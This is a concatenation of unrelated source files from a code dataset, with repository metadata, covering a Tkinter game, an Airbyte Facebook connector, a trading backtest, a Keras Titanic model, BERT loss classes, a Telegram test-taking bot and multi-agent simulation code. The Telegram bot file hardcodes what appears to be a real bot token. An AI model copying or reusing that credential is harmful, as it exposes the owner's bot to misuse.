table[i][j]['text'] = game[i][j]
try:
table[i][j]['bg'] = color[game[i][j]]
except KeyError:
table[i][j]['bg'] = 'white'
root = Tk()
table = [[Label(root, height=2, width=4, font='Arial 24') for i in range(N)] for j in range(N)]
for i in range(N):
for j in range(N):
table[i][j].grid(row=i, column=j)
for i in range(N):
root.grid_rowconfigure(i, pad=10)
root.grid_columnconfigure(i, pad=10)
game = Game()
draw(game)
root.bind('<Left>', left)
root.bind('<Right>', right)
root.bind('<Up>', up)
root.bind('<Down>', down)
root.mainloop() | [
"[email protected]"
]
| |
13f1896c22ae2a9880e175bd288981ebe1216ccf | 8d5ba6747531cbd43d63d32265fd608f9081c3b7 | /.venv/lib/python2.7/site-packages/indico/modules/events/logs/controllers.py | a436382fa8b13d29f35d97c1b401f0e523a58dd9 | []
| no_license | Collinsnyamao/indico | 0e433b78803afae5b1ac90483db1f3d90ce2fddb | 32adf8123e266eb81439b654abc993b98e0cd7f2 | refs/heads/master | 2020-03-18T04:55:40.386595 | 2018-06-02T13:45:47 | 2018-06-02T13:45:47 | 134,314,163 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,324 | py | # This file is part of Indico.
# Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from indico.modules.events.logs.models.entries import EventLogEntry
from indico.modules.events.logs.views import WPEventLogs
from indico.modules.events.management.controllers import RHManageEventBase
class RHEventLogs(RHManageEventBase):
"""Shows the modification/action log for the event"""
def _process(self):
entries = self.event.log_entries.order_by(EventLogEntry.logged_dt.desc()).all()
realms = {e.realm for e in entries}
return WPEventLogs.render_template('logs.html', self.event, entries=entries, realms=realms)
| [
"[email protected]"
]
| |
08a65bb7db851c3827f50ea795ce9e58ad45c818 | 7eebbfaee45fdc57c4fc6ba32c87c35be1e62b14 | /airbyte-integrations/connectors/source-facebook-pages/source_facebook_pages/streams.py | 717fb1c76800fc295cff19b40b475069c0e2914a | [
"MIT",
"Elastic-2.0"
]
| permissive | Velocity-Engineering/airbyte | b6e1fcead5b9fd7c74d50b9f27118654604dc8e0 | 802a8184cdd11c1eb905a54ed07c8732b0c0b807 | refs/heads/master | 2023-07-31T15:16:27.644737 | 2021-09-28T08:43:51 | 2021-09-28T08:43:51 | 370,730,633 | 0 | 1 | MIT | 2021-06-08T05:58:44 | 2021-05-25T14:55:43 | Java | UTF-8 | Python | false | false | 4,651 | py | #
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
from abc import ABC
from typing import Any, Iterable, Mapping, MutableMapping, Optional
import requests
from airbyte_cdk.sources.streams.http import HttpStream
from source_facebook_pages.metrics import PAGE_FIELDS, PAGE_METRICS, POST_FIELDS, POST_METRICS
class FacebookPagesStream(HttpStream, ABC):
url_base = "https://graph.facebook.com/v11.0/"
primary_key = "id"
data_field = "data"
def __init__(
self,
access_token: str = None,
page_id: str = None,
**kwargs,
):
super().__init__(**kwargs)
self._access_token = access_token
self._page_id = page_id
@property
def path_param(self):
return self.name[:-1]
def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:
data = response.json()
if not data.get("data") or not data.get("paging"):
return {}
return {
"limit": 100,
"after": data.get("paging", {}).get("cursors", {}).get("after"),
}
def request_params(
self,
stream_state: Mapping[str, Any],
stream_slice: Mapping[str, any] = None,
next_page_token: Mapping[str, Any] = None,
) -> MutableMapping[str, Any]:
next_page_token = next_page_token or {}
params = {"access_token": self._access_token, **next_page_token}
return params
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
if not self.data_field:
yield response.json()
records = response.json().get(self.data_field, [])
for record in records:
yield record
class Page(FacebookPagesStream):
"""
API docs: https://developers.facebook.com/docs/graph-api/reference/page/,
"""
data_field = ""
def path(self, **kwargs) -> str:
return self._page_id
def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:
return None
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params = super().request_params(**kwargs)
# we have to define which fields will return from Facebook API
# because FB API doesn't provide opportunity to get fields dynamically without delays
# so in PAGE_FIELDS we define fields that user can get from API
params["fields"] = PAGE_FIELDS
return params
class Post(FacebookPagesStream):
"""
https://developers.facebook.com/docs/graph-api/reference/v11.0/page/feed,
"""
def path(self, **kwargs) -> str:
return f"{self._page_id}/posts"
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params = super().request_params(**kwargs)
params["fields"] = POST_FIELDS
return params
class PageInsights(FacebookPagesStream):
"""
API docs: https://developers.facebook.com/docs/graph-api/reference/page/insights/,
"""
def path(self, **kwargs) -> str:
return f"{self._page_id}/insights"
def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:
return None
def request_params(
self,
stream_state: Mapping[str, Any],
stream_slice: Mapping[str, any] = None,
next_page_token: Mapping[str, Any] = None,
) -> MutableMapping[str, Any]:
params = super().request_params(stream_state, stream_slice, next_page_token)
params["metric"] = ",".join(PAGE_METRICS)
return params
class PostInsights(FacebookPagesStream):
"""
API docs: https://developers.facebook.com/docs/graph-api/reference/post/insights/,
"""
def path(self, **kwargs) -> str:
return f"{self._page_id}/posts"
def request_params(
self,
stream_state: Mapping[str, Any],
stream_slice: Mapping[str, any] = None,
next_page_token: Mapping[str, Any] = None,
) -> MutableMapping[str, Any]:
params = super().request_params(stream_state, stream_slice, next_page_token)
params["fields"] = f'insights.metric({",".join(POST_METRICS)})'
return params
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
# unique case so we override this method
records = response.json().get(self.data_field) or []
for insights in records:
if insights.get("insights"):
data = insights.get("insights").get("data")
for insight in data:
yield insight
else:
yield insights
| [
"[email protected]"
]
| |
7bbcb9ca9dda54951983837756510a5c06b96ee6 | 3df53a7188586c9e6ae26ebcc2ae788480c2f84a | /src/main2.py | 4bac4c6f4a29927f97706645fb6f3e81324a528e | []
| no_license | webclinic017/f-indicators | b24927a7008bf812fcfc394b39275ea7fb767039 | bfdd34a8e259fee8bce43ac5d0c268820e7bdd90 | refs/heads/master | 2023-08-10T02:58:49.123664 | 2020-05-11T15:31:12 | 2020-05-11T15:31:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,436 | py | # Import indicators
# Attach them to strategy obj
# Start GA with strategy obj
import logging
import pandas as pd
import numpy as np
from backtesting import Strategy, Backtest
from talib import SMA
from backtesting.lib import crossover
from pathlib import Path, PurePosixPath
from utils import TFConvertor
log = logging.getLogger("GA")
log.setLevel(logging.DEBUG)
path = Path(__file__).parent.resolve().parent
path = path.joinpath("logs/ga.log")
log.addHandler(logging.FileHandler(path.resolve()))
data = pd.read_csv("data_large/EURUSD_Candlestick_1_M_BID_09.05.2018-30.03.2020.csv")
data['Datetime'] = pd.to_datetime(data['Datetime'], format="%d.%m.%Y %H:%M:%S")
# set datetime as index
data = data.set_index('Datetime')
data_loc = data.loc["2017":"2020"]
datatmp = TFConvertor(data_loc, '4H') # It is different for every new individual
class SmaCross(Strategy):
# Define the two MA lags as *class variables*
# genome:
n1 = 2
n2 = 6
n3 = 10
n4 = 20
price = 'Close'
def init(self, *args, **kwargs):
# Precompute two moving averages
self.sma1 = self.I(SMA, datatmp["Close"], self.n1)
self.sma2 = self.I(SMA, datatmp["Close"], self.n2)
self.sma3 = self.I(SMA, datatmp["Close"], self.n3)
self.sma4 = self.I(SMA, datatmp["Close"], self.n4)
# self.sma1 = SMA(datatmp["Close"], self.n1)
# self.sma2 = SMA(datatmp["Close"], self.n2)
# self.sma3 = SMA(datatmp["Close"], self.n3)
# self.sma4 = SMA(datatmp["Close"], self.n4)
# Precompute support and resistance using specified function as first input of self.I()
# self.support_resistance = self.I(Pivot5points, self.data, self.sup_res_candles)
def next(self):
# If sma1 crosses above sma2, buy the asset
if crossover(self.sma1, self.sma2) and crossover(self.sma3, self.sma4):
try:
print("Is buying...")
self.buy()
except:
log.error("Something went wrong in buy() function!")
# Else, if sma1 crosses below sma2, sell it
elif crossover(self.sma2, self.sma1) and crossover(self.sma4, self.sma3):
try:
self.sell()
except:
log.error("Something went wrong in sell() function!")
bt = Backtest(datatmp, SmaCross, cash=10000, commission=.02)
result = bt.run()
print(result)
print(np.isnan(result.SQN)) | [
"[email protected]"
]
| |
fa97ee9fd2838b1142288a25b7c3b07d01df9382 | 80f622252281e6288d24b101dda0d4ee3634faed | /Titanic/model/model.py | 92f1eea0ae9e1af59615e0f34f8ec795553013ab | []
| no_license | jalondono/HandsOn-MachineLearning | c7cd7ce967180b84dffc2953d9ad5894c2bfc46e | eb3a3f2d6e490a827aa8b50cfb6e606cb3e85c5d | refs/heads/master | 2023-01-03T01:10:32.836434 | 2020-10-29T15:47:27 | 2020-10-29T15:47:27 | 300,308,942 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,158 | py | import pandas as pd
import numpy as np
import tensorflow.keras as K
import mlflow.tensorflow
import sys
import logging
import zipfile
# mlflow server --backend-store-uri mlruns/ --default-artifact-root mlruns/ --host 0.0.0.0 --port 5000
def getting_data(zipfolder, filename, cols):
"""
Get the data from a zip file
:param path: direction to zip file
:return: train dataset
"""
with zipfile.ZipFile(zipfolder, 'r') as zip_ref:
zip_ref.extractall()
data = pd.read_csv(filename, usecols=cols)
print('data set shape: ', data.shape, '\n')
print(data.head())
return data
def process_args(argv):
"""
convert the data arguments into the needed format
:param argv: Parameters
:return: converted parameters
"""
data_path = sys.argv[1] if len(sys.argv) > 1 else '../data'
debug = sys.argv[2].lower() if len(sys.argv) > 1 else 'false'
model_type = sys.argv[3] if len(sys.argv) > 1 else [256, 128]
model_type = model_type[1:-1].split(',')
splited_network = [int(x) for x in model_type]
alpha = float(sys.argv[4]) if len(sys.argv) > 1 else 0.5
l1_ratio = float(sys.argv[5]) if len(sys.argv) > 2 else 0
return data_path, debug, splited_network, alpha, l1_ratio
def create_model(network):
model = K.models.Sequential()
model.add(K.layers.Dense(units=256, input_dim=6,
kernel_initializer='ones',
kernel_regularizer=K.regularizers.l1(l1_ratio),
))
for units in network[1:]:
model.add(K.layers.Dense(units=units,
kernel_initializer='ones',
kernel_regularizer=K.regularizers.l1(l1_ratio),
))
model.add(K.layers.Dense(units=1, activation='sigmoid'))
opt = K.optimizers.Adam(learning_rate=alpha)
model.compile(optimizer=opt, loss='binary_crossentropy',
metrics=['accuracy'], )
print(model.summary())
return model
def train_model(model, X_train, Y_train, batch_size=128,
epoch=80, val_split=0.1):
"""
Perform the training of the model
:param model: model previously compiled
:return: history
"""
history = model.fit(x=X_train,
y=Y_train,
batch_size=128,
epochs=80,
validation_split=0.1)
return history
if __name__ == '__main__':
logging.basicConfig(level=logging.WARN)
logger = logging.getLogger(__name__)
# mlflow
mlflow.tensorflow.autolog()
# Utils cols from data
train_cols = ['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
test_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
X_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
Y_cols = ['Survived']
# Get value arguments
data_path, debug, network, alpha, l1_ratio = process_args(sys.argv)
# train Data
filename = 'train.csv'
data = getting_data(data_path, filename, train_cols)
data['Sex_b'] = pd.factorize(data.Sex)[0]
data = data.drop(['Sex'], axis=1)
data = data.rename(columns={"Sex_b": "Sex"})
# testing data
filename = 'test.csv'
test = getting_data(data_path, filename, test_cols)
test['Sex_b'] = pd.factorize(test.Sex)[0]
test = test.drop(['Sex'], axis=1)
test = test.rename(columns={"Sex_b": "Sex"})
# filling train na values with mean
column_means = data.mean()
data = data.fillna(column_means)
# filling test na values with mean
column_means = test.mean()
test = test.fillna(column_means)
input_data = np.array(data[X_cols])
label_date = np.array(data[Y_cols])
test_input_data = np.array(test[X_cols])
X_train = input_data
Y_train = label_date
# definition of the model
model = create_model(network)
# training model
history = train_model(model, X_train, Y_train)
# predicting
score = model.predict(test_input_data, batch_size=32, verbose=1)
print("Test score:", score[0])
print("Test accuracy:", score[1])
| [
"[email protected]"
]
| |
0ac4cdf0dc4d0068c5d28f7e139bf35bbae92bca | c1ed1b90f7e914aee1a17cd9b5bb83cf288f7e85 | /usersAccount/apps.py | 7e257ce953933d0d4ded1fea4b4a19236a69a80c | []
| no_license | tanaychaulinsec/User-authentication | 87e111f3731b57f9057554a58781d1a1705e351c | 6652e72a5b639174cb20ccdae1c49883bdcc8514 | refs/heads/master | 2022-12-12T10:41:25.172936 | 2020-08-25T15:39:00 | 2020-08-25T15:39:00 | 289,565,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 99 | py | from django.apps import AppConfig
class UsersaccountConfig(AppConfig):
name = 'usersAccount'
| [
"[email protected]"
]
| |
9c5ad899ca1d6c2c86cb40d5304177a1ce2f9f26 | d4945242794561f7e8621b7cace4c7c9d5c9e7ab | /testbucket.py | 4ab9dfdb4c82d77b57b85ee3b0501cd64b75b242 | []
| no_license | synthicap/TestStackBot | b275a9438b786a9201da4f81f57971c732b4272c | 7fbbebdfc953eb05385e028e7569007869e52acc | refs/heads/master | 2021-06-16T08:09:23.898823 | 2017-05-04T21:55:59 | 2017-05-04T21:55:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,865 | py | import os
import pickle
from secrets import token_urlsafe
import telebot
from flask import Flask, request
from redis import from_url
from telebot.types import Update, ReplyKeyboardMarkup, KeyboardButton
class Task:
is_text = None
text = None
correct = None
class Test:
tasks = []
results = {}
bot = telebot.TeleBot('345467048:AAEFochiYcGcP7TD5JqYwco8E56cOYCydrk')
app = Flask(__name__)
redis = from_url(os.environ['REDIS_URL'])
tests = {}
@bot.message_handler(commands=['start', 'help'])
def start(message):
text = '/new - create new test\n' \
'/pass - pass the test\n' \
'/mres - my result of the test\n' \
'/res - all results of the test\n' \
'/del - delete the test\n'
bot.send_message(message.chat.id, text)
@bot.message_handler(commands=['new'])
def new_test(message):
try:
test = Test()
test.key = token_urlsafe(8)
test.num = int(message.text.split()[-1])
tests['key'] = test
bot.send_message(message.chat.id, f'Key: {test.key}')
msg = bot.send_message(message.chat.id, 'Enter the task text')
bot.register_next_step_handler(msg, set_task_text)
except Exception as e:
bot.reply_to(message, str(e) + ' 0')
def set_task_text(message):
try:
task = Task()
task.is_text = message.content_type == 'text'
if task.is_text:
task.text = message.text
else:
task.text = message.photo[0].file_id
tests['key'].tasks.append(task)
msg = bot.send_message(message.chat.id, 'Enter the task correct answer')
bot.register_next_step_handler(msg, set_task_correct)
'''markup = ReplyKeyboardMarkup(one_time_keyboard=True, row_width=4)
markup.row(KeyboardButton(a) for a in answer)'''
except Exception as e:
bot.reply_to(message, str(e) + ' 2')
def set_task_correct(message):
try:
test = tests['key']
answer = message.text
if answer[0] == ':':
answer = set(answer.split()[1:])
test.tasks[-1].correct = answer
if test.num > 1:
test.num -= 1
msg = bot.send_message(message.chat.id, 'Enter the task text')
bot.register_next_step_handler(msg, set_task_text)
else:
key = test.key
del test.key
del test.num
del tests['key']
redis[key] = pickle.dumps(test)
bot.send_message(message.chat.id, 'Test successfully created!')
bot.send_message(message.chat.id, str(len(test.tasks)))
except Exception as e:
bot.reply_to(message, str(e) + ' 3')
@bot.message_handler(commands=['pass'])
def get_test(message):
try:
key = message.text.split()[-1]
test = pickle.loads(redis[key])
test.key = key
test.num = len(test.tasks)
test.ctasks = test.tasks.copy()
tests['key'] = test
test.results[message.from_user.username] = 0
bot.send_message(message.chat.id, f'Let\'s start the test, number of tasks: {test.num}')
task = test.tasks[0]
if task.is_text:
msg = bot.send_message(message.chat.id, task.text)
else:
msg = bot.send_photo(message.chat.id, task.text)
bot.register_next_step_handler(msg, get_task)
except Exception as e:
bot.reply_to(message, str(e) + ' 1')
def get_task(message):
try:
test = tests['key']
tasks = test.ctasks
name = message.from_user.username
correct = tasks.pop(0).correct
if correct is set:
answer = set(message.text.split())
else:
answer = message.text
test.results[name] += answer == correct
if tasks:
task = test.tasks[0]
if task.is_text:
msg = bot.send_message(message.chat.id, task.text)
else:
msg = bot.send_photo(message.chat.id, task.text)
bot.register_next_step_handler(msg, get_task)
else:
bot.send_message(message.chat.id, f'Your result is: {test.results[name]} / {test.num}')
key = test.key
del test.key
del test.num
del test.ctasks
del tests['key']
redis[key] = pickle.dumps(test)
except Exception as e:
bot.reply_to(message, str(e) + '3')
@bot.message_handler(commands=['mres'])
def get_result(message):
try:
test = pickle.loads(redis[message.text.split()[-1]])
result = test.results[message.from_user.username]
num = len(test.tasks)
bot.send_message(message.chat.id, f'Your result is: {result} / {num}')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@bot.message_handler(commands=['res'])
def get_list_results(message):
try:
test = pickle.loads(redis[message.text.split()[-1]])
num = len(test.tasks)
items = test.results.items()
if num:
bot.send_message(message.chat.id, 'Results:\n' + ''.join(f'{i[0]}: {i[1]} / {num}\n' for i in items))
else:
bot.send_message(message.chat.id, 'No results')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@bot.message_handler(commands=['del'])
def delete_test(message):
try:
bot.send_message(message.chat.id, 'Test successfully deleted!')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@app.route('/update', methods=['POST'])
def update():
bot.process_new_updates([Update.de_json(request.stream.read().decode('utf-8'))])
return '', 200
@app.route('/')
def index():
redis.flushdb()
bot.remove_webhook()
bot.set_webhook(url='https://teststackbot.herokuapp.com/update')
return '', 200
if __name__ == '__main__':
app.run()
| [
"[email protected]"
]
| |
a4c826fcfe6311083197e85bce0f8017a9af10bf | 3d928362dcde314562c80f83b79552983d4b0b37 | /bert/train/loss_models.py | d6ed29c74db721693b5aae118950c38050d26f6a | [
"Unlicense"
]
| permissive | nawshad/BERT-pytorch | 18a7c949b1a61055ff87399909b30cd978eb8218 | fe45c85846a7d5c5b2668879239f482384940366 | refs/heads/master | 2021-07-09T23:23:45.224286 | 2020-08-23T08:27:50 | 2020-08-23T08:27:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,538 | py | from bert.preprocess import PAD_INDEX
from torch import nn
class MLMNSPLossModel(nn.Module):
def __init__(self, model):
super(MLMNSPLossModel, self).__init__()
self.model = model
self.mlm_loss_function = nn.CrossEntropyLoss(ignore_index=PAD_INDEX)
self.nsp_loss_function = nn.CrossEntropyLoss()
def forward(self, inputs, targets):
outputs = self.model(inputs)
mlm_outputs, nsp_outputs = outputs
mlm_targets, is_nexts = targets
mlm_predictions, nsp_predictions = mlm_outputs.argmax(dim=2), nsp_outputs.argmax(dim=1)
predictions = (mlm_predictions, nsp_predictions)
batch_size, seq_len, vocabulary_size = mlm_outputs.size()
mlm_outputs_flat = mlm_outputs.view(batch_size * seq_len, vocabulary_size)
mlm_targets_flat = mlm_targets.view(batch_size * seq_len)
mlm_loss = self.mlm_loss_function(mlm_outputs_flat, mlm_targets_flat)
nsp_loss = self.nsp_loss_function(nsp_outputs, is_nexts)
loss = mlm_loss + nsp_loss
return predictions, loss.unsqueeze(dim=0)
class ClassificationLossModel(nn.Module):
def __init__(self, model):
super(ClassificationLossModel, self).__init__()
self.model = model
self.loss_function = nn.CrossEntropyLoss()
def forward(self, inputs, targets):
outputs = self.model(inputs)
predictions = outputs.argmax(dim=1)
loss = self.loss_function(outputs, targets)
return predictions, loss.unsqueeze(dim=0)
| [
"[email protected]"
]
| |
248ae932e96969c1f76bce884663f4cd1e7fdccd | 1238ad2367cbf51246ef21216f3f77398a963268 | /Machine-Learning/scikit-learn/senkei_sample_1.py | 7e4d9f5141874b128205167273934a3a25a2f113 | []
| no_license | shiro16/sunaba | 91c8fb58802993cf428bd2833c4417a234161e49 | 83d62c51a5c35d02cf93de38f6ebf4ab451816e0 | refs/heads/master | 2023-01-28T02:05:01.146155 | 2021-05-11T06:34:36 | 2021-05-11T06:34:36 | 84,282,959 | 0 | 0 | null | 2023-01-08T00:14:46 | 2017-03-08T05:42:13 | Python | UTF-8 | Python | false | false | 560 | py | import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model, datasets
# 乱数によるデータ生成
np.random.seed(0)
regdata = datasets.make_regression(100, 1, noise=20.0)
# 学習を行いモデルのパラメータを表示
lin = linear_model.LinearRegression()
lin.fit(regdata[0], regdata[1])
print("coef and intercept : ", lin.coef_, lin.intercept_)
print("score :", lin.score(regdata[0], regdata[1]))
# グラフ
xr = [-2.5, 2.5]
plt.plot(xr, lin.coef_ * xr + lin.intercept_)
plt.scatter(regdata[0], regdata[1])
plt.show()
| [
"[email protected]"
]
| |
3d1e771da9ec0f32bfd297a1b19794e9054adce4 | 1825283527f5a479204708feeaf55f4ab6d1290b | /leetcode/python/45/sol.py | 3db6f97188dd189aef4c4caf07b43524d9f7f299 | []
| no_license | frankieliu/problems | b82c61d3328ffcc1da2cbc95712563355f5d44b5 | 911c6622448a4be041834bcab25051dd0f9209b2 | refs/heads/master | 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 | HTML | UTF-8 | Python | false | false | 2,156 | py |
10-lines C++ (16ms) / Python BFS Solutions with Explanations
https://leetcode.com/problems/jump-game-ii/discuss/18019
* Lang: python3
* Author: jianchao-li
* Votes: 71
This problem has a nice BFS structure. Let's illustrate it using the example `nums = [2, 3, 1, 1, 4]` in the problem statement. We are initially at position `0`. Then we can move at most `nums[0]` steps from it. So, after one move, we may reach `nums[1] = 3` or `nums[2] = 1`. So these nodes are reachable in `1` move. From these nodes, we can further move to `nums[3] = 1` and `nums[4] = 4`. Now you can see that the target `nums[4] = 4` is reachable in `2` moves.
Putting these into codes, we keep two pointers `start` and `end` that record the current range of the starting nodes. Each time after we make a move, update `start` to be `end + 1` and `end` to be the farthest index that can be reached in `1` move from the current `[start, end]`.
To get an accepted solution, it is important to handle all the edge cases. And the following codes handle all of them in a unified way without using the unclean `if` statements :-)
----------
**C++**
class Solution {
public:
int jump(vector<int>& nums) {
int n = nums.size(), step = 0, start = 0, end = 0;
while (end < n - 1) {
step++;
int maxend = end + 1;
for (int i = start; i <= end; i++) {
if (i + nums[i] >= n - 1) return step;
maxend = max(maxend, i + nums[i]);
}
start = end + 1;
end = maxend;
}
return step;
}
};
----------
**Python**
class Solution:
# @param {integer[]} nums
# @return {integer}
def jump(self, nums):
n, start, end, step = len(nums), 0, 0, 0
while end < n - 1:
step += 1
maxend = end + 1
for i in range(start, end + 1):
if i + nums[i] >= n - 1:
return step
maxend = max(maxend, i + nums[i])
start, end = end + 1, maxend
return step
| [
"[email protected]"
]
| |
a43d5a84086bb4be7ba32c8067fcbd249315d7db | 929ce0470f5e9ce8ed7cabdfbcfa73c0b5b35d30 | /settings.py | 5d117541ecb60c1cac53f43154299046e18f055c | []
| no_license | milesgranger/cmdata | 2ee96706a61372c94955e0fd942e777149249e2c | 535b237af99d988e158ab8b5304d0d1340b7f908 | refs/heads/master | 2020-04-06T07:08:27.252382 | 2016-09-11T10:25:42 | 2016-09-11T10:25:42 | 65,610,733 | 0 | 1 | null | 2016-09-11T10:25:43 | 2016-08-13T09:44:49 | Python | UTF-8 | Python | false | false | 866 | py | import os
import logging
import json
from peewee import Model, SqliteDatabase
with open('settings.json', 'r') as myfile:
json_settings = json.loads(myfile.read())
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
SECRET_KEY = json_settings["SECRET_KEY"]
DEBUG = json_settings["DEBUG"]
#######################
### DATABASE CONFIG ###
#######################
DB_URI = json_settings['DATABASE']
DATABASE = SqliteDatabase(DB_URI, threadlocals=True)
class BaseModel(Model):
'''
Base class for all other DB Models
Basically defines which database to use
'''
class Meta:
database = DATABASE
#######################
### PATHS #############
#######################
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_DIR = os.path.join(ROOT_DIR, 'static')
TEMPLATES_DIR = os.path.join(ROOT_DIR, 'templates')
| [
"[email protected]"
]
| |
ff48c9f51db42b5415104dcad82dcc5e7180f1a0 | a097ecf40fee329cfa9e3f77e4b6e9e29a8f148a | /5_section/5_c4.py | ad4129556566f3c699ab43db88f59f5c50ed0ab1 | []
| no_license | FumihisaKobayashi/The_self_taught_python | 1e7008b17050db3e615c2f3aa68df2edc7f93192 | 329d376689029b75da73a6f98715cc7e83e8cc2c | refs/heads/master | 2021-01-06T16:04:13.382955 | 2020-07-28T14:39:24 | 2020-07-28T14:39:24 | 241,389,313 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | fumi = {
"身長": "1.73m",
"好きな色": "緑",
"好きな人": "Hideki Matsui"
}
answer = input("身長,好きな色 or 好きな人")
if answer in fumi:
a = fumi[answer]
print(a)
#:注意 | [
"[email protected]"
]
| |
794f234132b9911b2627c4d8a81cf9092ef9550b | 7751c53180eb5eda2c9ff6f1406d755733d7a3a0 | /multiagent/agents/bystander.py | 4f63775706930f75b6101b4a5bb89072ffa5e9a0 | [
"MIT"
]
| permissive | HassamSheikh/VIP_Protection_Envs | b2927de19565c6fb09d1db42105ea4defc7aa912 | ea8b4f702d037336812035abbf8aaa12e26f8c46 | refs/heads/master | 2020-07-14T01:32:15.620448 | 2019-08-29T18:03:45 | 2019-08-29T18:03:45 | 205,201,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,809 | py | import numpy as np
from . import *
class Bystander(Participant):
""" A bystander (crowd participant) in the bodyguard environment, performing a movement that involves visiting random landmarks. If the bystander is near a bodyguard, it stops...
"""
def __init__(self, scenario):
super().__init__(scenario)
self.action_callback = self.theaction
self.color = np.array([0.8, 0.0, 0.0]) # red
self.state.p_pos = np.random.uniform(-1,+1, scenario.world.dim_p)
self.state.p_vel = np.zeros(scenario.world.dim_p)
self.goal_a = None
self.wait_count = 0
def reset(self):
super(Bystander, self).reset()
self.goal_a=None
def theaction(self, agent, world):
""" The behavior of the bystanders. Implemented as callback function
"""
# If the agent finds itself out of range, jump to a random new location
if self.out_of_bounds():
self.reset()
bystander_action = Action()
# The bystanders freeze if they are near a bodyguard or have no goal
if self.near_bodyguard(agent, world) or not self.goal_a:
bystander_action.u = np.zeros(world.dim_p)
self.wait_count += 1
if self.wait_count > 50:
agent.goal_a = self.nearest_landmark(world)
relative_position = (agent.goal_a.state.p_pos - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position))
self.wait_count = 0
return bystander_action
# If the agent reached its goal, picks a new goal randomly from the landmarks
if self.reached_goal():
agent.goal_a = np.random.choice(world.landmarks)
# otherwise, move towards the landmark
relative_position = (agent.goal_a.state.p_pos - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position)) * self.step_size
return bystander_action
def near_bodyguard(self, agent, world):
bodyguard_p_pos = np.asarray([bodyguard.state.p_pos for bodyguard in self.scenario.bodyguards])
distance_between_all_bodyguards = np.linalg.norm(bodyguard_p_pos-agent.state.p_pos, axis=1)
return np.any(0.3 > distance_between_all_bodyguards)
def nearest_landmark(self, world):
landmark_p_pos = np.array([landmark.state.p_pos for landmark in world.landmarks])
idx = np.linalg.norm(landmark_p_pos-self.state.p_pos, axis=1).argsort()[0]
return world.landmarks[idx]
class StreetBystander(Bystander):
""" A bystander (crowd participant) in the bodyguard environment, performing Vicsek Particle Motion. If the bystander is near a bodyguard, it stops...
"""
def __init__(self, scenario):
super().__init__(scenario)
self.action_callback = self.theaction
self.theta = np.random.uniform(-np.pi,np.pi)
self.noise = np.random.rand()
def reset(self):
""" Reset the states of an agent """
self.state.p_vel = np.random.uniform(-.5, .5, self.scenario.world.dim_p)
self.theta=np.random.uniform(-np.pi,np.pi)
def theaction(self, agent, world):
""" The behavior of the bystanders. Implemented as callback function
"""
#print("bystander action")
# If the agent finds itself out of range, jump to a random new location
bystander_action = Action()
#The bystanders freeze if they are near a bodyguard
if self.near_bodyguard(agent, world) or self.out_of_bounds():
bystander_action.u = np.array([-0.2, -0.2])
return bystander_action
# otherwise, move towards the landmark
relative_position= (self.vicsek_step() - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position))
return bystander_action
def near_bodyguard(self, agent, world):
bodyguard_p_pos = np.asarray([bodyguard.state.p_pos for bodyguard in self.scenario.bodyguards])
distance_between_all_bodyguards = np.linalg.norm(bodyguard_p_pos-agent.state.p_pos, axis=1)
return np.any(0.1 > distance_between_all_bodyguards)
def vicsek_step(self):
noise_increments = (self.noise - 0.5)
bystander_p_pos = np.asarray([bystander.state.p_pos for bystander in self.scenario.bystanders])
distance_between_all_crowd = np.linalg.norm(bystander_p_pos-self.state.p_pos, axis=1)
np.nan_to_num(distance_between_all_crowd, False)
near_range_bystanders = np.where((distance_between_all_crowd > 0) & (distance_between_all_crowd <=1.5))[0].tolist()
near_angles = [self.scenario.bystanders[idx].theta for idx in near_range_bystanders]
near_angles = np.array(near_angles)
mean_directions = np.arctan2(np.mean(np.sin(near_angles)), np.mean(np.cos(near_angles)))
self.theta = mean_directions + noise_increments
vel = np.multiply([np.cos(self.theta), np.sin(self.theta)], self.state.p_vel)
position = self.state.p_pos + (vel * 0.15)
if not ((-self.scenario.env_range <= position[0] <= self.scenario.env_range) and (-self.scenario.env_range <= position[1] <= self.scenario.env_range)):
return copy.deepcopy(self.state.p_pos + .1)
return np.clip(position, -1, 1)
class HostileBystander(Bystander):
"""A Hostile Bystander"""
def __init__(self, scenario):
super().__init__(scenario)
